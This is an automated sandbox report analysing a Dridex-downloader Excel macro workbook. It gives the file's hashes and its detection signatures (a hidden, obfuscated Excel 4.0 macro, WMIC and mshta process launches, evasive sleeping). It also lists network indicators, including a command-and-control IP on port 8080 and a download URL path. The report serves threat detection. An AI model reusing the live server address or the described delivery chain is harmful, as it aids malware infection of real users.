Windows Analysis Report 08676789691.xlsm

Overview

General Information

Sample Name: 08676789691.xlsm
Analysis ID: 532305
MD5: 2ac8e068af04acae7b07a376b1adcf57
SHA1: 7034cd5a8fb78c201bfeae534c301029c2150bfe
SHA256: 7efd1141f6d4858cd381b53fabdb2906a0a23c1329dbae42327aeda63c934dfb
Tags: Dridexxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Sigma detected: TA505 Dropper Load Pattern
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Sample execution stops while process was sleeping (likely an evasion)
Launches processes in debugging mode, may be used to hinder debugging
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: 08676789691.xlsm ReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\wbem\WMIC.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.6:49825 -> 157.230.250.107:8080
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.6:49825 -> 157.230.250.107:8080

Networking:

barindex
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49825 -> 157.230.250.107:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 157.230.250.107 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8
Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/
Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/$
Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/K
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mf
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkr
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrm
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmot
Source: mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfucker
Source: mshta.exe, 00000015.00000002.616675030.000001E529CC1000.00000004.00000020.sdmp, mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y
Source: mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y8
Source: mshta.exe, 00000015.00000002.616675030.000001E529CC1000.00000004.00000020.sdmp, mshta.exe, 00000015.00000003.544394222.000001E529CC1000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82s
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sas4
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhR
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhore
Source: mshta.exe, 00000015.00000003.544339050.000001E529C6B000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616453866.000001E529C64000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9
Source: mshta.exe, 00000015.00000002.619578044.000001ED2C934000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000003.544266956.000001ED2C92F000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e)
Source: mshta.exe, 00000015.00000003.544339050.000001E529C6B000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e8
Source: mshta.exe, 00000015.00000003.544339050.000001E529C6B000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9eB
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9en
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehx
Source: mshta.exe, 00000015.00000003.544313024.000001ED2C916000.00000004.00000001.sdmp String found in binary or memory: http://157.230.250.107:8080/n
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/tf
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:808dll
Source: mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmp String found in binary or memory: http://157.D
Source: EXCEL.EXE, 00000000.00000002.629522370.0000000012CF0000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glidesve
Source: EXCEL.EXE, 00000000.00000002.626211549.000000000D6EE000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagramV
Source: EXCEL.EXE, 00000000.00000002.626177284.000000000D6CE000.00000004.00000001.sdmp String found in binary or memory: http://purl.oclc.org/ooxml/drawingml/table5X
Source: EXCEL.EXE, 00000000.00000003.470229606.0000000015A74000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469474716.0000000015BB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469644138.0000000015C27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472175577.000000001590F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472166299.0000000015BB7000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000003.472175577.000000001590F000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000003.470229606.0000000015A74000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469474716.0000000015BB7000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.469644138.0000000015C27000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.472166299.0000000015BB7000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: http://weather.service.msn.com/data.aspxdC
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryb
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.aadrm.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.aadrm.com/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplatettJ
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.cortana.ai
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://api.diagnosticssdf.office.comK
Source: EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://api.microsoftstream.com/api/nt
Source: 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.dr String found in binary or memory: https://api.office.net
Source: EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp String found in binary or memory: https://api.office.net?
